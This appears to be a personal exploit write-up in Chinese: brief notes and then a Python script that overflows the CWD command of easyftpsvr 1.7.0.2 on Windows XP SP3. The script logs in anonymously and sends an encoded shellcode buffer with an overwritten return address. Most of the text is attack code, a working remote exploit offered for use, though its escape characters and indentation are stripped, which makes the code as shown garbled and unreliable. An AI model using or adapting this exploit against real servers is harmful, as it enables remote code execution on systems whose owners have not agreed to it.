程序是FTP软件
分析登陆发包情况
然后发送 'CWD XXXXXX' 造成溢出
熟悉 FTP命令!!
程序也有检测字符···
还不是很清楚 为什么 弹框没有显示字···························
环境 : XP SP3 中文
easyftpsvr-1.7.0.2
import socket,sys
def ftp_test(ip,port):
target = ip
port = port
shellcode = ('x50x20'
'xD9xEE'
'xD9x74x24xF4'
'x58'
'x83xC0x1b'
'x33xC9'
'x8Ax1Cx08'
'x80xF3x11'
'x88x1Cx08'
'x41'
'x80xFBx90'
'x75xF1'
'xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d'
'x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42'
'x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a'
'x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84'
'xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48'
'x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b'
'xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64'
'xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12'
'x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca'
'x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41'
'x42xeex46xedx42xeex46xe9x81')#198
buffer = shellcode+'a'*(268-198)+'xa0x6fx5fx7d'
#7D5F6FA0 59 pop ecx
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect = s.connect((target,port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
h = s.recv(1024)
print h
s.send('USER anonymous
')
h = s.recv(1024)
print h
s.send('PASS anonymous
')
h = s.recv(1024)
print h
print "[+] Sending buffer"
s.send('CWD '+ buffer + '
')
try:
h = s.recv(1024)
print h
print "failed"
except:
print "ok"
if __name__ == '__main__':
ftp_test('127.0.0.1',21)